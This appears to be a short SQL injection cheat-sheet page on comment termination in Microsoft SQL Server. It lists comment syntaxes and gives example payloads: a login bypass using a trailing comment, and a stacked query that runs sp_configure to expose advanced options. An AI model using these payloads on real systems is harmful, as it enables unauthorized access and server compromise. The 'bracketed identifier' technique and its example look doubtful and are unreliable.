Comment Out Query
In SQL injection attacks, commenting out the remainder of a query is often necessary to ensure that the injection payload works correctly without syntax errors. This technique is commonly known as “comment termination.”
In Microsoft SQL Server (MSSQL), you can use the following methods to comment out the rest of a query:
| Comment Type | Syntax | Description |
|---|---|---|
| Single-line comment | -- | Requires a space after the dashes |
| Inline/block comment | /*...*/ | Can span multiple lines |
| Batch separator | ; | Terminates the current batch |
| Bracketed identifier | [ANYTHING] | In specific contexts only |
Examples
-- Example 1: Using -- to comment out the rest of the query
SELECT * FROM Users WHERE username = 'admin'-- ' AND password = 'password'
-- Example 2: Using /* */ for inline commenting
SELECT * FROM Users WHERE username = 'admin'/* ' AND password = 'password' */
-- Example 3: Using ; to terminate and start a new query
SELECT * FROM Users WHERE username = 'admin'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- Example 4: Brackets can sometimes be used in specific contexts
SELECT * FROM Users WHERE username = 'admin'['];
Notes
- MSSQL requires a space or new line after the
--comment syntax. - In some cases, MSSQL ignores comment syntax in strings, so ensure that your injection point has proper quoting.
- Using the
;batch separator can be particularly powerful as it allows execution of additional SQL statements. - When using batch separators, be aware that permissions and error handling may differ from the original query.